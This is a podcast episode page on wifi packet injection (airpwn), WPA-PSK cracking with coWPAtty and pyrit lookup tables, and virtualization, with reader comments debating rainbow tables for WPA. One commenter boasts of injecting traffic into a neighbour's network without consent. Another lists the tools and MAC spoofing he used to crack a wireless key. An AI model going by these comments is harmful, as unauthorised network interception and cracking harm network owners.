The gang gathers at a dive in Hoboken, NJ during their trip to NYC for the live diggnation and discuss wireless packet injection with airpwn, advancements in WPA-PSK attacks and of course, virtualization.

Download HD Download MP4 Download XviD Download WMV

In an effort to thwart hangovers the gang drops by DC’s Taven in Hoboken to geek out about Wifi and Virtualization over shots and cold ones.

Darren is excited about the recent improvements to both Airpwn and Cowpatty.

Edit: Mubix points out these awesome WPA Tables from Offensive-Security (You know ‘em as the BackTrack guys).

Best WPA Tables out there for us with CoWPAtty. (And another little + is they posted the password list they used to generate the tables, which is also an AWESOME password list for cracking all kinds of passwords. ;-)

Matt answers some viewers questions and encourages more for an upcoming special.

Shannon has all the deets on this week’s contest and LAN party.

Leave a Reply

Your email address will not be published. Required fields are marked *

*

17 Comments

  • ioyou 4 years ago

    Man, I love airpwn.
    I just compiled the new version on my backtrack and i have it running on my neighbors wifi lol.

    He gets pissed every time lol. It redirects him to my backtrack php-cgi apache server and redirects him to rick roll lol

  • mistertylersmith 4 years ago

    is that blue moon? if so, good choice.

  • Sc00bz 4 years ago

    Just letting you know it is impossible to make rainbow tables for WPA-PSK and have them be of any use. The four-way handshake has two nonces (256 bits each) and two mac addresses for salt. Which means you can’t make a rainbow table for that. Now Winrtgen does have an option to make WPA-PSK tables. This requires you to have the WPA-PSK hash, but if you have the WPA-PSK hash you can already get onto the network so knowing the password is really pointless. Unless the password is changed frequently and you find the pattern, but this will never happen in the real world because you would need to break in multiple times and crack multiple hashes. Also no one changes their wireless key frequently and keeps some pattern to it.

    ** Funny story about passwords **
    At NIU you are required to change your password once a semester. “Your password must be 8 characters long. It must be a mix of numbers and lowercase letters.” (yes I know they are dumb the key space is only 2^41.25 “2.61 trillion” hopefully that’s right) and my English teacher told everyone to do something like fall2009 and then change it to spring09 (yes I know he’s retarded). I’m embarrassed to have graduated from there. Hmm this is a perfect example why you never have passwords that expire because people will just put the current year at the end, increment a number, or if it’s too frequent like at NIU for my English teacher the whole password will be when the password is valid.

    Now what you can do for WPA-PSK is take a list of passwords and pre-calculate the hashes of them and store that. Then when you capture the handshake all you need to do is take a hash do a few hmacs and check the answer. This is exactly how coWPAtty works.

    If you don’t believe me here’s a nice little quote:
    “This page is to give a little more insight into the methodology and logic behind concieving and building the CoWF WPA-PSK Rainbow Tables (actually they are lookup tables but I just like the term ‘rainbow tables’ alot.)” -renderlab.net

  • Haha, cool episode and cool variation to regular episodes!

  • Please don’t do this kind of episodes anymore. It’s annoying to listen when there is so much background noise.

  • Investe 4 years ago

    Well, I liked it! It’s something different and sometimes I couldn’t unterstand very well (probably because my english sucks) but I think it’s a good break. It shows you are active, creative and never boring! And I like the fact that you all were kinda drunk at the end…Well done.

  • Cowpatty is out.

    Have you heard of pyrit at http://code.google.com/p/pyrit/ for generation for WPA hashes? The power of Stream/Cuda have made much bigger tables possible. :)

  • David 4 years ago

    Sc00bz: There’s no reason why it’s “impossible” to make PMK rainbow tables. A rainbow table is just a more advanced form of lookup table, where instead of mapping each plaintext directly to its hash (as is done in a lookup table), the start of a chain of hashes and reductions is mapped to the end of the chain. Looking up a reduced hash in the rainbow table involves hashing and reducing it incrementally until it matches the endpoint of some chain. This means that the size of the table can be greatly reduced, at the expense of extra computation to look up hashes. Furthermore, the amount of computation tradeoff can be adjusted just by adjusting the chain length.

    Designing PMK rainbow tables would only require someone to define a class of reduction functions that can transform a PMK to a PSK, and of course develop a tool that can generate and interpret these tables. As you say, cowpatty/genpmk only works with lookup tables.

    As for your saying that you cannot make rainbow tables “for” the four-way handshake, that doesn’t make sense anyway. The four-way handshake is just used to generate a client’s PTK(s) for the session, and requires both the client station and the access point to already know the PMK beforehand. We’re not concerned about this process or the salts used in this process. We’re only concerned about the PSK-to-PMK hashing process (that is, converting a cleartext passphrase to the big 32-byte hash). The only unpredictable salt used in this hashing process is the SSID (and SSID length, but that is easily dervied from the SSID), which is why there are separate tables for different SSIDs.

    • Hi David,
      I had the same idea, but it has a drawback we can’t overcome.
      We don’t have any initial PMK to apply the reduction function
      and to compare later with the values stored at the table.

      In a ordinary TMTO attack, the initial attacked value would be a block ciphered with an unknown key (which maps to a known cleartext block) or a hash value which maps to a unknown password. But, we don’t have such a value in this case.

      Also, the passphrase is “salted” with the ESSID of the network, so we would have to build a separate table for each different ESSID, that renders the attack impracticable the most of the times.

      Best regards,
      Fernando.

  • Anyone know which antenna Darrin is using with the ALFA receiver? I have the same receiver.
    Thanks

  • @JT, it’s just a 9dBi antenna I had floating around. Not sure what it came off. You can pick ‘em up pretty cheap off ebay and the like. http://www.google.com/products?q=9db+antenna&scoring=p

  • Just an FYI, you don’t want to consider the bare metal hypervisor in ESXi (or ESX) for ANYTHING that you would like audio for. It’s not supported. Also, there’s a limitation of 6 pseudo PCI devices, and the display always takes up one, so you are really limited to 5. For a little more flexibility in those situations, use Microsoft Virtual PC, or VMWare Workstation. I hadn’t actually played with VMWare Workstation until I got the license for passing the VCP exam, but I actually like it!

  • Sc00bz 4 years ago

    David, you missed the most important part of that “just letting you know it is impossible to make rainbow tables for WPA-PSK and have them be of any use.” Let’s say you have a PMK rainbow table for the correct SSID. Now all you need is the PMK to use the rainbow table, but if you have the PMK you can already get onto the network. So knowing the PSK is not useful.

    P.S. I lied on the not being able to make a rainbow table for the four-way handshake. By “you can’t make a rainbow table for that” I mean you need to do 2^304 times more work (because of the nonce and mac) if you “are the access point” or 2^608 times more work if you aren’t. Which is infeasible for the next 450 years.

  • David said “Sc00bz: There’s no reason why it’s “impossible” to make PMK rainbow tables.”

    For practical purposes, this is in correct, or at least, impractical.

    You could write a rainbow table to compute a PMK with the associated the PSK, which would not be useful against recovering the the WPA2 4-way handshake. It would only be useful if you got the PMK through some other means (like dumping it from the registry). Even then, it’s not useful, because you don’t actually need the PSK to connect to the network. You can actually paste the PMK right into the Windows network setup, which is why the PSK is limited to 63 characters (the PMK is 64 characters, allowing the developer to figure out what you mean – PSK or PMK – just by looking at the length of the input string).

    It’s not possible to write a rainbow table to attack the 4-way handshake exchange since the nonces represent uniqueness in the conversation that can’t be precomputed. You could not ascertain, for example, a partial match from a precomputed PMK without the entire PMK itself, making the time/memory trade-off ineffective hear. I think the way cowpatty does PMK precomputation is the best that can be accomplished given the design of WPA (and kudos to the IEEE for providing a reasonable protocol for *consumer* network authentication and key derivation).

    -Josh

    p.s. For the record, coWPAtty was intended to make fun of WPA, not my code. :)

  • PRIMEVAL 4 years ago

    THIS episode i have downloaded twice (xvid & avi) both downloads have the megabytes there but don’t play, other episodes do, also the embedded video doesn’t play…..is it just me or is there a wee glitch in the system….?

  • Shinji 4 years ago

    I don’t know about WPA (havn’t tried personally) but I don’t even need Backtrack for Wireless hacking. Here is what I used…

    Ubuntu
    aircrack-ng (package)
    macchanger (package)
    Intel Wifi Link 5100

    Then I just followed these instructions:

    I used ‘macchanger –random’ so I would get a new mac address but it was random so can’t be blocked easily. I just made note of the new mac. The adapter was put into monitor mode. I had the key cracked in less than 20 minutes on an empty network (i.e. no one connected at all).

  • You guys need to be drinking faster… you did like a whole show on 1 glass of beer. Blue moon is the heat so drink it. Don’t let it get warm. Shame on you all.